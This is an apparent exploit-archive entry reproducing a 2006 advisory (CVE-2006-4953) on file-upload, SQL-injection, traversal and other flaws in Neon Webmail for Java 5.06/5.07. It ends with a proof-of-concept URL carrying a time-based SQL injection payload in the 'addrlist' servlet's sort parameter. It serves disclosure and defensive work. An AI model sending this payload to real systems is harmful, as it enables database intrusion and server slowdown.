NeoSys Neon Webmail for Java 5.06/5.07 - 'addrlist' Servlet Multiple SQL Injections

Author: Tan Chew Keong
type: webapps
platform: jsp
port: 
date_added: 2006-09-20  
date_updated: 2017-10-20  
verified: 1  
codes: CVE-2006-4953;OSVDB-29138  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 28607.txt  
source: https://www.securityfocus.com/bid/20109/info

Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include:

- an arbitrary-file-upload vulnerability
- an arbitrary-email-manipulation vulnerability
- multiple SQL-injection vulnerabilities
- an unauthorized-access vulnerability
- multiple directory-traversal vulnerabilities
- an HTML-injection vulnerability.

An attacker can exploit these issues to compromise the affected application.

Versions 5.06 and 5.07 (build.200607050) are vulnerable to these issue; prior versions may also be affected.

http://www.example.com/neonwebmail/addrlist?PAGE=1&sysid=0&adr_sortkey=rand(benchmark(1000000000000, sha1('123456781234567812345678')))&adr_sortkey_desc= ID, SELECT * FROM T_ADDR_BOOK WHERE ID = 'username' ORDER BYrand(benchmark(1000000000000,sha1('123456781234567812345678'))),SYSID DESC